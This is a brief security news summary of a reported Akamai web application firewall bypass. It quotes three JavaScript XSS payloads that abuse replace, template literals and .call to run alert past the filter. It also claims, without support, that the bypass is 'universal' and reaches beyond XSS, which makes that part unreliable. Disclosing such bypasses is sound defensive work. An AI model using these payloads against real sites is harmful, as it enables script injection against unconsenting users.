Akamai WAF, a widely used web application firewall, has been bypassed using clever JavaScript payloads leveraging the replace function in different forms. The bypass utilizes JavaScript template literals and function call manipulations, such as '`' and '.call' within string replace methods. The three example payloads that bypass the WAF are: 'a'.replace.call`1${/./}${alert}`, 'a,'.replace`a${alert}`, and 'a'.replace(/./,alert). These payloads exploit the way JavaScript processes and evaluates the replace method with regular expressions and template literals to execute an alert function, which could be used for XSS attacks. The bypass method is universal, not limited to a single vulnerability like XSS or SQL injection, as it demonstrates bypassing JavaScript content filters, likely enabling script execution. This indicates that Akamai WAF's JavaScript content filtering can be circumvented using advanced JavaScript features and syntax, showing the importance of improving WAF detection for such payloads to prevent client-side code injection and XSS vulnerabilities.
For more insights, check out the original tweet here: https://twitter.com/Arram_web3/status/1949161180817195091